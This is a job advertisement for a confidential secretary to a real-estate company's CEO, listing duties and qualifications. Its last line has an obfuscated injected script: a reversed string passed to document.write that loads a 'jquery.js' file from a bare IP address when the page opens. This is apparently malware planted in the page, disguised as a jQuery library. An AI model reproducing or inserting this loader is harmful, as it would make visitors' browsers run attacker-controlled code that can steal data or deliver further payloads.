Industry : Real Estate
• Perform day-to-day secretarial duties to Chief Executive Officer which are confidential in nature and provide administrative support.
• Identify and prepare information requirements of the CEO for meetings, appointments, presentations etc.
• Follow up on inward and outwards requests for information, outstanding reports, and correspondence.
• Co‐ordinate and maintain the diary of the CEO including organising of all appointments, meetings.
• Support all employees business related travel arrangements including flight and accommodation.
• Arrange meeting rooms for internal and external meetings as requested, and in advance for recurring meetings.
• Assist and coordinate company events.
• Maintain a systematic filing system and safe keeping of important documents.
• Liaise with company secretarial pertaining to any company matters that need to be approved by CEO.
• Undertake special assignments, as-hoc functions & related duties as & when required.
• Candidate must possess at least a Diploma/ Advanced/ Higher/ Graduate Diploma in Secretarial or equivalent.
• Computer literate with good knowledge in Microsoft Office.
• Good time management and demonstrable experience in working to deadlines
• Attention to detail
• Highly organized, self-motivated with the personal drive to complete multiple tasks
• Comfortable and professional in situations that require high levels of confidentiality or sensitivity document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))